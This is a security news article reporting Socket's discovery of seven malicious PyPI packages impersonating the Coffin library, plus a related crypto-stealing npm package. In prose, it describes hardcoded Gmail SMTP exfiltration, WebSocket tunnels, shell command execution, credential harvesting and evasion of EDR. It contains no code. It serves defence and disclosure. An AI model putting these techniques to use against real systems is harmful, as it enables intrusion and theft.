Malicious PyPI Packages Exploit Gmail and WebSockets to Hijack Systems

Seven malicious PyPI packages exploited Gmail and WebSockets for remote command execution and data theft, with some packages downloaded over 18,000 times.
Malicious PyPI Packages Exploit Gmail and WebSockets to Hijack Systems
Table of Contents
    Add a header to begin generating the table of contents

    Seven malicious packages were identified on PyPI, utilizing Gmail’s SMTP servers and WebSockets for data exfiltration and remote command execution.

    Discovery and Removal of Malicious Packages

    The threat research team at Socket discovered these packages and reported their findings to PyPI, leading to their removal. Some of these packages had been available for over four years, with one package downloaded more than 18,000 times.

    List of Malicious Packages

    Here are the malicious packages identified by Socket:

    • Coffin-Codes-Pro (9,000 downloads)
    • Coffin-Codes-NET2 (6,200 downloads)
    • Coffin-Codes-NET (6,100 downloads)
    • Coffin-Codes-2022 (18,100 downloads)
    • Coffin2022 (6,500 downloads)
    • Coffin-Grave (6,500 downloads)
    • cfc-bsb (2,900 downloads)

    These packages impersonated the legitimate Coffin package, which integrates Jinja2 templates into Django projects.

    Malicious Functionality and Operations

    Socket’s investigation revealed that these packages enabled covert remote access and data exfiltration through Gmail. They used hardcoded Gmail credentials to log into the SMTP server (smtp.gmail.com) to send reconnaissance data, allowing attackers to remotely access compromised systems.

    Techniques for Evasion

    Since Gmail is a trusted service, firewalls and endpoint detection and response (EDR) systems are less likely to flag this activity as suspicious. Once the email signaling was complete, the malware connected to a remote server using WebSocket over SSL, establishing a persistent, encrypted, bidirectional tunnel.

    Capabilities of the Malware

    Using a ‘Client’ class, the malware could:

    • Forward traffic from the compromised host to the local system
    • Access internal admin panels and APIs
    • Transfer files
    • Exfiltrate emails
    • Execute shell commands
    • Harvest credentials
    • Move laterally within networks

    Indicators of Cryptocurrency Theft

    Socket highlighted strong indicators that these packages aimed to steal cryptocurrency, as seen in the email addresses used, such as blockchain.bitcoins2020@gmail.com. This method resembles past tactics used to steal Solana private keys.

    If you have installed any of these packages, it is crucial to remove them immediately and rotate any affected keys and credentials.

    Related Findings in NPM

    A related report by Sonatype researcher Ax Sharma detailed a crypto-stealing package named crypto-encrypt-ts, found on npm. This package masqueraded as a TypeScript version of the now-unmaintained CryptoJS library while exfiltrating cryptocurrency wallet secrets to a threat actor-controlled endpoint.

    The malicious package, which persists on infected systems through cron jobs, targets wallets with balances exceeding 1,000 units, attempting to steal their private keys. It was downloaded nearly 2,000 times before being reported and removed.

    Related Posts